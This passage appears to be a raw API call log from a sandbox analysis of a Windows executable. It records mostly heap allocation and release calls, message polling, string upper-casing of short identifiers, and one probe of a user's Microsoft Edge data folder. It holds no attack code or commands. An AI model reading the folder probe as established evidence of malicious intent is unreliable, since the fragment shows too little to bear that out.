(HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0173.994] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0173.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0173.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0173.995] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0173.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0173.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0173.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0173.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0173.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0173.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0173.996] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0173.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0173.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0173.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0173.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0173.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0173.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0173.998] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0173.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0173.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0173.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0173.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0173.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0173.998] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0173.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0173.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0173.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0173.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0173.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0173.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0173.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0173.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0173.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0173.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0173.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0173.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0173.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0173.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0173.999] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/MicrosoftEdge", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a9a8d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc895324f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd6772beb, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 0x9e1eb8 [0173.999] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0173.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0173.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0173.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0173.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.000] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0174.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0174.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0174.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0174.001] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0174.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa948 [0174.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0174.001] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0174.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0174.002] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0174.002] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0174.002] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0174.002] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0174.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0174.003] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0174.003] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0174.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0174.003] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0174.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 